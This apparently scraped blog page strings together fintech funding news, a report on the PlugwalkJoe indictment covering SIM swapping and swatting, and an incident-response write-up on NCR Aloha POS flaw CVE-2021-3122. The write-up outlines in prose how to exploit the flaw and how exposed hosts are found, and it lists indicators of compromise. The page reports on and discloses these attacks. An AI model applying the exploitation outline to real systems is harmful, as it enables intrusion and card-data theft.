Nium crosses $1B valuation with $200M Riverwood Capital-led round

/0 Comments/in /by

Business-to-business payments platform Nium announced Monday that it raised more than $200 million in Series D funding and saw its valuation rise above $1 billion.

The company, now Singapore-based but shifting to the Bay Area, touted the investment as making it “the first B2B payments unicorn from Southeast Asia.”

Riverwood Capital led the round, in which Temasek, Visa, Vertex Ventures, Atinum Capital, Beacon Venture Capital and Rocket Capital Investment participated, along with a group of angel investors like DoorDash’s Gokul Rajaram, FIS’ Vicky Bindra and Tribe Capital’s Arjun Sethi. Including the new funding, Nium has raised $300 million to date, Prajit Nanu, co-founder and CEO, told TechCrunch.

The B2B payments sector is already hot, yet underpenetrated, according to some experts. To give an idea just how hot, Nium was seeking $150 million for its Series D round, received commitments of $300 million from eager investors and settled on $200 million, Nanu said.

“This is our fourth or fifth fundraise, but we have never had this kind of interest before — we even had our term sheets in five days,” he added. “I believe this interest is because we’ve successfully managed to create a global platform that is heavily regulated, which gives us access to a lot of networks. This is an environment where payment is visible, and our core is powering frictionless commerce and enabling anyone to use our platform.”

Nium’s new round adds fuel to a fire shared by a number of companies all going after a global B2B payments market valued at $120 trillion annually: last week, Paystand raised $50 million in Series C funding to make B2B payments cashless, while Dwolla raised $21 million for its API that allows companies to build and facilitate fast payments. In March, Higo brought in $3.3 million to do the same in Latin America, while Balance, developing a B2B payments platform that allows merchants to offer a variety of payment methods. raised $5.5 million in February.

Paystand banks $50M to make B2B payments cashless and with no fees

Nium’s approach is to provide access to a global payment infrastructure, including card issuance, accounts receivable and payable, and banking-as-a-service through a single API. The company’s network enables customers to then send funds to more than 100 countries, pay out in more than 60 currencies, accept funds in seven currencies and issue cards in more than 40 countries, Nanu said. The company also boasts money transfer, card issuances and banking licenses in 11 jurisdictions.

Francisco Alvarez-Demalde, co-founding partner and managing partner at Riverwood, said in an email that the combination of software — plus regulatory licenses — and operating a fintech infrastructure platform on behalf of neobanks and corporates is a global trend experiencing hyper-growth.

Riverwood followed Nium for many years, and its future vision was what got the firm interested in being a part of this round. Alvarez-Demalde said that “Nium has the incredible combination of a great market opportunity, a talented founder and team, and we believe the company is poised for global growth based on underlying secular technology trends like increasing real-time payment capabilities and the proliferation of cross border commerce.

“As a central payment infrastructure in one API, Nium is a catalyst that unlocks cross-border payments, local accounts and card issuance with a network of local market licenses, partners and banking relationships to facilitate moving money across the world,” he added. “Enterprises of all types are embedding financial services as part of their consumer experience, and Nium is a key global enabler of this trend.”

Nanu said the new funding enables the company to move to the United States, which represents 3% of Nium’s revenue. He wants to increase that to 20% over the next 18 months, as well as expand in Latin America. The investment also gives the company a 12- to 18-month runway for further M&A activity.  In June, Nium acquired virtual card issuance company Ixaris, and in July acquired Wirecard Forex India to expose it to India’s market. He also plans to expand the company’s payments network infrastructure, invest in product development and add to Nium’s 700-person headcount.

Nium already counts hundreds of enterprise companies as clients and plans to onboard thousands more in the next year. The company processes $8 billion in payments annually and has issued more than 30 million virtual cards since 2015. Meanwhile, revenue grew by over 280% year over year.

All of this growth puts the company on a trajectory for an initial public offering, Nanu said. He has already spoken to people who will help the company formally kick off that journey in the first quarter of 2022.

“Unlike other companies that raise money for new products, we aim to expand in the existing sets of what we do,” Nanu said. “The U.S. is a new market, but we have a good brand and will use the new round to provide a better experience to the customer.”

B2B marketplaces will be the next billion-dollar e-commerce startups

 

Sedna banks $34M for a platform that parses large volumes of email and chat to automatically action items within them

/0 Comments/in /by

Many have tried to do away with it, but email refuses to die… although in the process it might be (figuratively speaking) killing some of us with the workload it brings on to triage and use it. A startup called Sedna has built a system to help with that — specifically for enterprise and other business customers — by “reading” the text of emails, and chats, and automatically actioning items within them so that you don’t have to. And today, it’s announcing funding of $34 million to expand its work.

The funding, a Series B, is being led by Insight Partners, with Stride.VC, Chalfen Ventures and the SAP.iO fund (part of SAP) also participating. The funding will be used to continue building out more data science around Sedna’s core functionality, with the aim of moving into a wider set of verticals over time. Currently its main business is in the area of supply chain players, with Glencore, Norden, and Bunge among its customers. Other customers in areas like finance include the neobank Starling. London-based Sedna is not disclosing valuation.

Bill Dobie, Sedna’s CEO and founder originally from Vancouver but now in London, said the idea for the company was hatched out of his own experience.

“I spent years building software to help users be more productive, but no matter what we built we never really reduced people’s workload,” he said. The reason: the millstone that is called email, with its endless, unsolicited, inbound messages, some of which (just enough not to ignore) might be important. “What really struck me was how long it spent to move items out of and into email,” he said of the “to-do’s” that arose out of there.

Out of that, Sedna was built to “read” emails and give them more context and direction. Its system removes duplicates of action items and essentially increases the strike rate when it comes people’s inboxes: what’s in there is more likely to be what you really need to see. And it does so at a very quick speed.

“Our main value is the sheer scale at which we operate,” Dobie said. “We read millions or even billions of messages in sub second response times.” Indeed, while many of us are not getting “millions” of emails, there is a world of messaging out there that needs reading beyond that. Think, for example, of the volume of data that will be coming down the pike from IoT-based diagnostics.

“Smart” inboxes have definitely become a thing for consumers — although arguably none work as well as you wish they did. What’s notable about Sedna has been how it’s tuned its particular algorithms to specific verticals, letting them get smarter around the kind of content and work practices in particular organizations.

Right now the work is driven by an API framework, with elements of “low code” formatting to let people shape their own Sedna experiences. The aim will be to make that even easier over time. AN API driven frame work right now, some low code we’re heading into, but mostly its SAP or shipping or trading system that understands the transaction under way, then Sedna uses a decision tree to categories. 

Another area where Sedna might grow is in how it handles the information that it ingests. Currently, the company’s tech can be interconnected by a customer to then hand off certain work to RPA systems, as well as to specific humans. There is an obvious route to developing some of the second stage of software there — or alternatively, it’s a sign of how something like Sedna might get snapped up, or copied by one of the big RPA players.

“Bill started reimagining email where it was most broken and therefore hardest to fix—large teams managing huge volumes and complicated processes,” said Rebecca Liu-Doyle, principal at Insight Partners, in a statement. “Today, Sedna’s power is in its ability to introduce immense speed, simplicity, and delight to any inbox experience, regardless of scale or complexity. We are excited to partner with the Sedna team as they continue to make digital communication more intelligent for teams in global supply chain and beyond.” Liu-Doyle is joining the board with this round.

SAP is a strategic investor in this round, as Sedna potentially helps its customers be more productive while using SAP systems. “SAP continues to partner with SEDNA to deliver value to SAP customers. The ability to turn complex information into simpler intelligent collaboration has been a growing priority for many SAP customers,” said Stefan Sauer, global transport solutions Lead at SAP, in a statement.

PlugwalkJoe Does the Perp Walk

/0 Comments/in /by

Joseph “PlugwalkJoe” O’Connor, in a photo from a paid press release on Sept. 02, 2020, pitching him as a trustworthy cryptocurrency expert and advisor.

One day after last summer’s mass-hack of Twitter, KrebsOnSecurity wrote that 22-year-old British citizen Joseph “PlugwalkJoe” O’Connor appeared to have been involved in the incident. When the U.S. Justice Department last week announced O’Connor’s arrest and indictment, his alleged role in the Twitter compromise was well covered in the media.

But most of the coverage seems to have overlooked the far more sinister criminal charges in the indictment, which involve an underground scene wherein young men turn to extortion, sextortion, SIM swapping, death threats and physical attacks — all in a frenzied effort to seize control over social media accounts.

Skim the government’s indictment and you might overlook a footnote on Page 4 that says O’Connor is part of a group that had exactly zero reservations about using their playbook of harassment tactics against law enforcement agents who were already investigating their alleged crimes.

O’Connor has potentially been linked to additional prior swatting incidents and possibly (although not confirmed and currently still under investigation) the swatting of a U.S. law enforcement officer,” the footnote reads.

Swatting involves making a false report to authorities in a target’s name with the intention of sending a heavily armed police force to that person’s address. It’s a potentially deadly hoax: Earlier this month, a Tennessee man was sentenced to 60 months in prison for setting in motion a swatting attack that led to the death of a 60-year-old grandfather.

As for the actual criminal charges, O’Connor faces ten counts, including conspiracy, computer intrusion, extortive communications, stalking and threatening communications.

FEMALE TARGETS

All of those come into play in the case of the Snapchat account of actor Bella Thorne, who was allegedly targeted by PlugwalkJoe and associates in June 2019.

Investigators say O’Connor was involved in a “SIM swap” against Thorne’s mobile phone number. Unauthorized SIM swapping is a scheme in which fraudsters trick or bribe employees at wireless phone companies into redirecting the target’s text messages and phone calls to a device they control. From there, the attackers can reset the password for any online account that allows password resets via SMS.

In this case, the SIM swap was done to wrest control over Thorne’s Snapchat account. Once inside, the attackers found nude photos of Thorne, which they then threatened to release unless she agreed to post on social media thanking the hackers using their online handles.

The intruders posted on Thorne’s Snapchat, “Will drop nudes if 5000 of you follow @PlugwalkJoe.” Thorne told the feds her phone lost service shortly before her account was hijacked. Investigators later found the same Internet address used to access Thorne’s Snapchat account also was used minutes later to access “@Joe” on Instagram, which O’Connor has claimed publicly.

On June 15, 2019, Thorne posted on Twitter that she’d been “threatened with my own nudes,” and posted screenshots of the text message with the individual who had extorted him/her. Thorne said she was releasing the photographs so that the individual would not be able to “take yet another thing from me.”

The indictment alleges O’Connor also swatted and cyberstalked a 16-year-old girl, sending her nude photos and threatening to rape and/or murder her and her family.

Social media personality Addison Rae had 55 million followers when her TikTok account got hacked last August. I noted on Twitter at the time that PlugWalkJoe had left his calling card yet again. The indictment alleges O’Connor also was involved in a SIM-swap against Rae’s mobile number.


BAD REACTION

Prosecutors believe that roughly a week after the Twitter hack O’Connor called in bomb threats and swatting attacks targeting a high school and an airport in California. They’re confident it was O’Connor making the swatting and bomb threat calls because his voice is on record in a call he made to federal investigators, as well as to an inmate arrested for SIM swapping.

Curiously left out of the media coverage of O’Connor’s alleged crimes is that PlugwalkJoe appears to have admitted in a phone call with the FBI to being part of a criminal conspiracy. In the days following the Twitter mass-hack, O’Connor was quoted in The New York Times denying any involvement in the Twitter bitcoin scam. “I don’t care,” O’Connor told The Times. “They can come arrest me. I would laugh at them. I haven’t done anything.”

Speaking with KrebsOnSecurity via Instagram instant message just days after the Twitter hack, O’Connor demanded that his name be kept out of future blog posts here. After he was told that couldn’t be promised, he mentioned that some people in his circle of friends had been known to hire others to deliver physical beatings on people they didn’t like. In nearly the same breath, O’Connor said he was open to talking to federal investigators and telling his side of the story.

According to the indictment, a week after the Twitter hack a man identifying himself as O’Connor called federal investigators in Northern California. Specifically, the call went to the REACT Task Force. REACT is a team of law enforcement officers and prosecutors based in Santa Clara, Calif. that is focused on catching criminal SIM swappers, and by this point REACT already had plenty of audio from phone calls traced back to O’Connor in which he allegedly participated in a SIM swapping or swatting attack.

“REACT began receiving tips in 2018 regarding illegal activity of an individual using the online moniker ‘PlugwalkJoe,’ purportedly identified as O’Connor from the United Kingdom,” the indictment states.

Prosecutors redacted the name of the law enforcement officer who allegedly was swatted by PlugwalkJoe, referring to him only as “C.T.,” a criminal investigator for the Santa Clara District Attorney and a REACT Task Force member.

FBI agents called O’Connor back at the number he left. O’Connor told the FBI that on the afternoon of July 15, 2020 he’d been in contact with other associates who were in communications with the alleged mastermind of the Twitter bitcoin scam. Those intermediaries worked directly with Graham Clark, then 17, who pleaded guilty to fraud charges last summer in connection with the Twitter hack and agreed to serve three years in prison followed by three years of probation.

The indictment says O’Connor told the feds he only wanted his friends to relay his desire for Clark to secure several different short Twitter usernames that belonged to other people, accounts that were to be later sold for a profit. The other associates who allegedly helped PlugwalkJoe interact with Clark also have since been charged in connection with the Twitter hack.

A copy of the indictment is here (PDF).

The Good, the Bad and the Ugly in Cybersecurity – Week 30

/0 Comments/in /by

The Good

It was a year ago almost to the week that we reported on a mass cyber hack against at least 130 social media celebrities. As we reported at the time, Twitter accounts belonging to the likes of Joe Biden, Barack Obama, Elon Musk, Bill Gates, Apple and Uber were all breached and used to pull off a Bitcoin scam that netted the hackers over $100,000 in less than 24 hours. This week, it looks as though cybercops have caught up with yet another of the alleged perpetrators.

Police in Spain arrested a 22-year old British man, Joseph O’Connor, on suspicion of being behind the attack. Three others, two from the U.S and another from the U.K, have already been charged in the case. O’Connor faces computer intrusion charges relating to the Twitter hack as well as similar intrusions of TikTok and Snapchat. The Department of Justice says he is also being charged with cyberstalking a juvenile.

With the help of the U.K.’s National Crime Agency, the Spanish National Police arrested O’Connor on Wednesday after a request from U.S. authorities following a criminal complaint filed in the U.S. District Court for the Northern District of California. Once again, international law enforcement cooperation has proven vital in bringing those who perpetrate cyber crimes to justice.

The Bad

There was already plenty of controversy swirling around the Tokyo Olympics – from Russia’s stealth involvement to whether the event should even be taking place given the ongoing pandemic – but of course, cyber attackers had to get in on the act, too.

Initially, news broke early in the week apparently from a Japanese government source suggesting that login IDs and passwords for the Tokyo Olympic ticket portal had been posted to a Darknet “leaks” website following a breach. A spokesperson for the Tokyo 2020 Olympics International Communications Team later contradicted that claim, saying the government source was mistaken.

While it seems there had been some leaks, these were not related to a breach of the ticket portal. Rather, it appears some ticket holders as well as Olympic Village volunteers had been infected with malware and leaked their own credentials.

It seems these individuals were infected with infostealer malware that exfiltrated credentials stored in their browsers. The data was subsequently offered for sale on underground marketplaces.

While it’s certainly welcome to learn that a general breach of the Olympics ticket portal hasn’t taken place, there are concerns that threat actors are targeting the event. The FBI released an alert this week warning that cyber actors who wish to disrupt the event could use distributed denial of service (DDoS) attacks, ransomware, social engineering, phishing campaigns, or insider threats against entities associated with the Tokyo 2020 Summer Olympics. All involved are advised to remain vigilant and maintain best practices in their network and digital environments.

The Ugly

News has been breaking across mainstream media since Sunday regarding the use of iOS and Android spyware being sold to authoritarian regimes by private security contractor NSO. Apparently, the spyware platform known as “Pegasus” is meant to be used to target ‘persons of interest’ to governments and law enforcement agencies, but campaigners such as Amnesty International claim that the spyware is used by oppressive regimes to facilitate human rights violations around the world on a massive scale.

While opinion remains divided as to the true extent of the use of NSO’s spyware in the wild, there’s no doubt that there are genuine concerns that the spyware has been used to expose activists, journalists and politicians critical of certain governments.

Meanwhile, researchers claim that they have proof that the Pegasus spyware has successfully infected iPhone 11 and iPhone 12 models through iMessage zero-click attacks. Pegasus marketing material offers prospective clients unlimited access to targets’ mobile devices while “leaving no trace on the target devices”.

Source: Pegasus marketing material

NSO, for its part, disputes the claims made in the most recent revelations, arguing that the number of targets is substantially lower than the 50,000 claimed by campaigners, and that the company vets all its clients to ensure abuses do not occur.

Amidst all of this is another ongoing debate about Apple’s approach to security. The famously-secretive device manufacturer argues that iPhone security is enhanced by its opaque, proprietary operating system and Apple’s tight reign on application distribution. Many security researchers and privacy activists, on the other hand, say that such a ‘security by obscurity’ approach only serves to abet criminals by  making it impossible for users to detect whether their devices have been compromised.

It’s a debate that’s not going to go away any time soon. Readers might like to reflect on whether they would be happy using desktop and laptop computers that, by design, were unable to run any third-party security software. If one feels nervous at the prospect of leaving computer security entirely in the hands of an OS vendor, it’s hard to imagine why we should be comfortable doing the same with our phones.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Paystand banks $50M to make B2B payments cashless and with no fees

/0 Comments/in /by

It’s pretty easy for individuals to send money back and forth, and there are lots of cash apps from which to choose. On the commercial side, however, one business trying to send $100,000 the same way is not as easy.

Paystand wants to change that. The Scotts Valley, California-based company is using cloud technology and the Ethereum blockchain as the engine for its Paystand Bank Network that enables business-to-business payments with zero fees.

The company raised $50 million Series C funding led by NewView Capital, with participation from SoftBank’s SB Opportunity Fund and King River Capital. This brings the company’s total funding to $85 million, Paystand co-founder and CEO Jeremy Almond told TechCrunch.

During the 2008 economic downturn, Almond’s family lost their home. He decided to go back to graduate school and did his thesis on how commercial banking could be better and how digital transformation would be the answer. Gleaning his company vision from the enterprise side, Almond said what Venmo does for consumers, Paystand does for commercial transactions between mid-market and enterprise customers.

“Revenue is the lifeblood of a business, and money has become software, yet everything is in the cloud except for revenue,” he added.

He estimates that almost half of enterprise payments still involve a paper check, while fintech bets heavily on cards that come with 2% to 3% transaction fees, which Almond said is untenable when a business is routinely sending $100,000 invoices. Paystand is charging a flat monthly rate rather than a fee per transaction.

Paystand’s platform. Image Credits: Paystand

On the consumer side, companies like Square and Stripe were among the first wave of companies predominantly focused on accounts payable and then building business process software on top of an existing infrastructure.

Paystand’s view of the world is that the accounts receivables side is harder and why there aren’t many competitors. This is why Paystand is surfing the next wave of fintech, driven by blockchain and decentralized finance, to transform the $125 trillion B2B payment industry by offering an autonomous, cashless and feeless payment network that will be an alternative to cards, Almond said.

Customers using Paystand over a three-year period are able to yield average benefits like 50% savings on the cost of receivables and $850,000 savings on transaction fees. The company is seeing a 200% increase in monthly network payment value and customers grew two-fold in the past year.

The company said it will use the new funding to continue to grow the business by investing in open infrastructure. Specifically, Almond would like to reboot digital finance, starting with B2B payments, and reimagine the entire CFO stack.

“I’ve wanted something like this to exist for 20 years,” Almond said. “Sometimes it is the unsexy areas that can have the biggest impacts.”

As part of the investment, Jazmin Medina, principal at NewView Capital, will join Paystand’s board. She told TechCrunch that while the venture firm is a generalist, it is rooted in fintech and fintech infrastructure.

She also agrees with Almond that the B2B payments space is lagging in terms of innovation and has “strong conviction” in what Almond is doing to help mid-market companies proactively manage their cash needs.

“There is a wide blue ocean of the payment industry, and all of these companies have to be entirely digital to stay competitive,” Medina added. “There is a glaring hole if your revenue is holding you back because you are not digital. That is why the time is now.”

All B2B startups are in the payments business

 

Payments company Paystone raises $23.8M to help service-based businesses engage with customers

/0 Comments/in /by

Paystone, a payments and integrated software company, secured another strategic investment this year, this time $23.8 million ($30 million CAD) from Crédit Mutuel Equity, the private equity arm of Crédit Mutuel Alliance Fédérale.

The Canada-based company got its start in 2008 as the payment processing company Zomaron, and rebranded itself as Paystone in 2019. Today it provides electronic payments and customer engagement technology to businesses, particularly those that provide services, CEO Tarique Al-Ansari told TechCrunch.

“Paystone is on a mission to help businesses grow, and we were enthralled by their commitment to that mission and their focus on service-oriented verticals,” said Léa Perge, investor at Crédit Mutuel Equity in Canada, via email.

While most of the company’s peers focus on product companies, Al-Ansari saw how underserved the service side was: their needs are different, and unlike retail, aren’t looking to sell online. Rather, they need an online presence and digital marketing to engage with customers, but their focus is being findable and having content that tells people why they should do business with them.

Paystone provides the marketing through content, help with reviews and with loyalty and rewards programs. However, rather than reward for spending, Paystone rewards for behavior. Refer a friend, get a reward. Write a review, get a reward. Al-Ansari calls it “payments as a benefit.” Referrals and reviews are how businesses become more findable, and the more content that’s out there, the more it helps people consider the business trustworthy, he added.

The new funding gives Canada-based Paystone total funds raised in 2021 of $78.8 million in a mix of debt and equity. It raised $54.9 million in January, funds that were barely touched as of yet, Al-Ansari said.

Though he wasn’t actively seeking new funds, Al-Ansari had been speaking with Crédit Mutuel Equity, which used to be CIC Capital Canada, prior to the pandemic, and their deal was put on hold.

Crédit Mutuel Equity came back with similar interest, and taking into account the kind of talent Paystone wanted to go after and its acquisition strategy — the company has already acquired five companies — Al-Ansari decided to take the additional funds. He said it gives the company options to hire more and double down on building the company, as well as enough capital to look for more acquisitions.

This year, Paystone entered the U.S. market for the first time and will do a proper launch later this year. The company has over 30,000 merchant locations on its platform throughout North America, and Al-Ansari expects that to grow by 5,000 this year. The company has 150 employees currently, and another 50 are expected to come on board by the end of the year.

In addition, Al-Ansari expects growth to accelerate for the rest of the year. The company processes around $6 billion in credit card payments and is on track to bring in $55.7 million in revenue this year. It is cash flow positive, residuals from the company’s origins of being bootstrapped, he said.

“We want to become the go-to destination for service businesses to set up a digital presence to accept payments and provide loyalty and rewards,” Al-Ansari said. “We will do this by solidifying our market position and growing our platform with the tools that customers want.”

Customer feedback is a development opportunity

 

CVE-2021-3122 | How We Caught a Threat Actor Exploiting NCR POS Zero Day

/0 Comments/in /by

A guest post by Kyle Pagelow from Tetra Defense

In this post, we describe how our Incident Response team discovered and thwarted a threat actor stealing credit card data by exploiting a zero day RCE (remote code execution) vulnerability in NCR’s Aloha Point of Sale software, widely used in the catering and restaurant industries.

Our investigation led us to discover and report CVE-2021-3122. While Tetra Defense successfully defended the client’s business, removing the threat actor’s access from the client’s network and mitigating the entire infection chain, a large number of other potential victims are readily discoverable, many of whom could be actively exploited today.

According to the vendor, CVE-2021-3122 is a client misconfiguration, and it appears that it is up to each client using Aloha POS to ensure that the server is properly configured and cannot be exploited in the way described in this post.

While we acknowledge NCR’s position, it is also worth pointing out that this “misconfiguration” is widely deployed and known to be actively exploited. Therefore, we urge all NCR Aloha POS users to ensure their Aloha POS configuration follows NCR’s guidelines and to confirm that their POS network has not been compromised in the manner we discuss in detail below.

Point of Ingress | The Threat Actor’s Initial Compromise

NCR’s Aloha POS software is an end to end point of sale system application primarily used by restaurants to take orders, accept credit card payments and manage other sensitive business functions. As is standard practice, our client was running Aloha POS on an isolated private network, with a number of terminals utilizing this network. The only outward bound communication from any endpoint on the network was to the Aloha Back of House (BOH) server.

The Aloha BOH server provides administrative functions for each of the POS terminals and is responsible for all external communications. Primarily, external traffic consists of communication between the BOH server and NCR’s own servers for the purpose of receiving various administrative commands, performing maintenance and updating the POS terminals when required.

Prior to our IR investigation team being brought in, the client’s network appears to have first been compromised in February 2017. BlackPOS, rtPOS, GratefulPOS and PWNPOS were observed on the client’s systems, along with BTCamant ransomware, shortly after the client had installed an MSP provider. While some of the malware infections avoided C2 communications and wrote files out locally to disk, by December 2018 RampagePOS was observed communicating with a C2 at support[.]nesinoder[.]com. This domain was later seen to be associated with Maze ransomware.

In September 2019, the threat actor began utilizing a commercial remote monitoring and management tool (RMM) called screenconnect. The threat actors configured the RMM tool to report to their own C2s and cleverly disguised the DNS to blend in with legitimate traffic to NCR by using the address support-ncr-aloha[.]net.

The threat actor’s next step was to begin installing credit card stealing malware on both the BOH server and terminal endpoints on January 9th, 2020. At this time, malware was pushed to the terminals using a batch script to update the hosts file on each terminal with an entry labelled ‘back’ and the IP address of the BOH server. Since the terminals had no ability to communicate externally, the malware was configured to send encrypted, scraped credit card data to the BOH server over port 1888.

Discovering the BOH RCE Attack Vector

While it’s not surprising that the terminals could have their hosts files manipulated by the BOH server, the attack’s real menace comes from the exploitation of an hitherto unknown vulnerability in the support[.]ncr-aloha[.]net running on the BOH server. While NCR has been at pains to point out that the exploit requires an unsupported configuration, our investigation found that there are hundreds of Aloha BOH servers currently configured in this way and, therefore, vulnerable to attack.

As attack methods, motives, and consequences change daily, our IR investigation team uses SentinelOne Singularity as our constant ongoing endpoint protection and alert method. We deployed SentinelOne on the client’s terminals and BOH servers as part of our emergency incident response effort. This allowed us not only to get full visibility into the threat actor’s TTPs but also alerts at each stage of the ongoing infection. Via the SentinelOne agents and management console, we were able to identify connections from external IP addresses to the Aloha Command Center Agent occurring over port 8089.

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

Learn More

Having rebuilt the entire Aloha POS network, now with SentinelOne installed, we were able to observe how the actor then re-compromised the system. It quickly became apparent that the threat actor was able to connect to the cmcAgent.exe externally and run commands with SYSTEM level privileges.

The SentinelOne agent alerted us as the threat actor dropped an instance of the DoublePulsar backdoor on the BOH server and wrote malware to the screenconnect directory in c:windowstemp. The threat actor used the Eternal Champion exploit from FUZZBUNCH to install the malware.

In addition, we observed the threat actor utilizing other LOLBins such as certutil to download files, the net command to mount shares to public IP addresses, and netsh to open ports on the Windows firewall and expose services such as RDP.

We leveraged the management console’s Deep Visibility feature and found that the malware was using msiexec for the screenconnect MSI to reach out to the attacker’s C2 at support[.]ncr-aloha[.]net.

At this point, we leveraged the SentinelOne remote shell feature to kill off screenconnect and quarantine the cmcAgent.exe. We ran further Deep Visibility queries to prevent the threat actor from further exploitation of the network.

Discovering CVE-2021-3122 and Creating a POC Exploit

Having secured the client’s network, our next task was to understand what vulnerability the threat actor was leveraging to access the Aloha BOH server. Our investigation found that a flaw exists within the NCR Command Center Agent (cmcAgent.exe). Systems that are configured with an internet-facing Command Center Agent display a banner with the hostname of the server and are discoverable through network scanning and banner grabbing. Simple searches can also be conducted through the use of tools such as shodan.io.

The cmcAgent’s RUNCommand function allows for a parameter to be supplied in a specially crafted XML request that can be executed remotely if the server is configured to listen on TCP port 8089 for incoming connections. Passing such a command allows the attacker to execute that command as SYSTEM.

In our POC, we executed a custom command remotely against a virtual machine that had the cmcAgent running. We created several requests and executed cmd.exe, powershell.exe and calc.exe. All processes spawned under the ‘SYSTEM’ user and were running in the background.

Additionally, when connecting to the port, the server will return a response with the hostname of the system as well as other information indicating the system is running Aloha software. This means it is a simple matter to conduct a shodan search for the banner and see which NCR customers have the Command Center Agent publicly exposed.

Responsible Disclosure and Vendor Response

In June of 2020, Tetra contacted the vendor NCR, creators of the Aloha platform in order to responsibly disclose the vulnerability. NCR had indicated the vulnerability is only exploitable if customers are misconfigured and have the CMCagent’s listening port exposed. NCR updated their documentation for the CMCAgent, and added a requirement not to have the CMCAgent internet-facing. Tetra contacted CISA and disclosed the vulnerability in December of 2020. MITRE rated the vulnerability with a CVS of 9.8.

Recommendations and Mitigation

NCR customers are urged to ensure they have updated to the latest available version.

Users running the Aloha POS system in their environment are strongly urged to review their system configuration and prohibit unauthorized hosts from connecting to vulnerable systems.

Users should run an up-to-date security solution such as SentinelOne Singularity across their environment and review security alerts.

Indicators of Compromise

alohaterm.exe    RAMPAGEPOS         9b8cc45f061565f00f9aab34e6fbcec6fae4633f
alohaterm.exe    RAMPAGEPOS         7c7c8ef5877f01011438410a4075e92731c7c51a
ttfmgr.exe       GratefulPOS        2d9b601d09bc1e49c94b316263f96d6ee6e57c54
ALOHAPROXY.EXE   PWNPOS             7899092e973b38988aa472dabf20314f00399233
wnhelp.exe       PWNPOS             b1983db46e0cb4687e4c55b64c4d8d53551877fa
alohas.exe       BlackPOS           1df323c48c8ce95a80d1e3b9c368c7d7eaf395fc
alohae.exe       rtPOS              a3c81c9e3d92c5007ac2ef75451fe007721189c6
IECache11.dll    RAMPAGEPOS         bf6291d67a21c6cef919c8cc3e485b93daf8d71f
IECache32.dll    RAMPAGEPOS         3688ab0e31a2f2a8a2adeb934c1a10738ec0f2d6
RUBTBGBB.EXE     Trojan/Downloader  0894872f398e19051f5a6be1a50c44943e9635e8
d.exe            Double Pulsar      dc11a846e090094fc82d0cc6ca8914d09113658e
e.exe            Eternal Champion   4c5cc3ec6866a2054eb47820b35ad8a7d8982cd2
UCL.DLL          Double Pulsar      4dfde37e5ff0a4b189f0c644b19b20fa63c41fe1
QOXJPZPX.EXE     Downloader         0894872f398e19051f5a6be1a50c44943e9635e8
TASKENG.EXE      Bitcoin Miner      282239c7d8e8606c88b15f7f2c7f30b5ec1b7fd4
SystemIISSec.exe Bitcoin Miner      835c84dba74fdd2564806daf68958d22feaa2225
g.exe            Bitcoin Miner      a067833f67d829241703c9f488d5834c84b096fe
Chromes.exe      Bitcoin Miner      cfe8c611e1a475a60f181005606d4094d1dad8e3
wslog_tblog6.tmp Bitcoin Miner      eea0c3febedd84a0c2d69dfb1fb5a077ca8d320b
wslog_tblog3.tmp Bitcoin Miner      cfe8c611e1a475a60f181005606d4094d1dad8e3
audlodg.exe      Bitcoin Miner      cb3550ca012a39fbf48ad26f3b2bb1d4f8657b2e
TASKENG.EXE      Bitcoin Miner      282239c7d8e8606c88b15f7f2c7f30b5ec1b7fd4
TOMORROW.EXE     Miner installer    43299c2cdc2a0290de05b01ec6d04160bfcef99f

ncr-aloha[.]net         C&C URL
support.ncr-aloha[.]net C&C URL
nesinoder[.]com         C&C URL
Support.nesinoder[.]com C&C URL
data-wire[.]net
185.41.65[.]211         C&C IP
5.34.183[.]20           C&C IP
130.0.237[.]133         C&C IP
47.90.58[.]130          Bitcoin Miner IP
185.56.80[.]118         IP used in RDP
62.20.60[.]242          IP used in RDP
78.465.89[.]74          IP used in RDP

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Tailor Brands raises $50M, aims to be one-stop shop for small businesses to launch

/0 Comments/in /by

Tailor Brands, a startup that automates parts of the branding and marketing process for small businesses, announced Thursday it has raised $50 million in Series C funding.

GoDaddy led the round as a strategic partner and was joined by OurCrowd and existing investors Pitango Growth, Mangrove Capital Partners, Armat Group, Disruptive VC and Whip Media founder Richard Rosenblatt. Tailor Brands has now raised a total of $70 million since its inception in 2015.

“GoDaddy is empowering everyday entrepreneurs around the world by providing all of the help and tools to succeed online,” said Andrew Morbitzer, vice president of corporate development at GoDaddy, in a written statement. “We are excited to invest in Tailor Brands — and its team — as we believe in their vision. Their platform truly helps entrepreneurs start their business quickly and easily with AI-powered logo design and branding services.”

When Tailor Brands, which launched at TechCrunch’s Startup Battlefield in 2014, raised its last round, a $15.5 million Series B, in 2018, the company was focused on AI-driven logo creation.

The company, headquartered in New York and Tel Aviv, is now compiling the components for a one-stop SaaS platform — providing the design, branding and marketing services a small business owner needs to launch and scale operations, and within minutes, Yali Saar, co-founder and CEO of Tailor Brands told TechCrunch.

Tailor Brands Aims To Bring Small Business Owners Affordable Access To Professional Design

Over the past year, more users are flocking to Tailor Brands; the company is onboarding some 700,000 new users per month for help in the earliest stages of setting up their business. In fact, the company saw a 27% increase in new business incorporations as the creator and gig economy gained traction in 2020, Saar said.

In addition to the scores of new users, the company crossed 30 million businesses using the platform. At the end of 2019, Tailor Brands started monetizing its offerings and “grew at a staggering rate,” Saar added. The company yielded triple-digit annual growth in revenue.

To support that growth, the new funding will be used on R&D, to double the team and create additional capabilities and functions. There may also be future acquisition opportunities on the table.

Saar said Tailor Brands is at a point where it can begin leveraging the massive amount of data on small businesses it gathers to help them be proactive rather than reactive, turning the platform into a “consultant of sorts” to guide customers through the next steps of their businesses.

“Users are looking for us to provide them with everything, so we are starting to incorporate more products with the goal of creating an ecosystem, like WeChat, where you don’t need to leave the platform at all to manage your business,” Saar said.

Knowing when your startup should go all-in on business development

 

Sendlane raises $20M to convert shoppers into loyal customers

/0 Comments/in /by

Sendlane, a San Diego-based multichannel marketing automation platform, announced Thursday it raised $20 million in Series A funding.

Five Elms Capital and others invested in the round to give Sendlane total funding of $23 million since the company was founded in 2018.

Though the company officially started three years ago, co-founder and CEO Jimmy Kim told TechCrunch he began working on the idea back in 2013 with two other co-founders.

They were all email marketers in different lines of business, but had some common ground in that they were all using email tools they didn’t like. The ones they did like came with too big of a price tag for a small business, Kim said. They set out to build their own email marketing automation platform for customers that wanted to do more than email campaigns and newsletters.

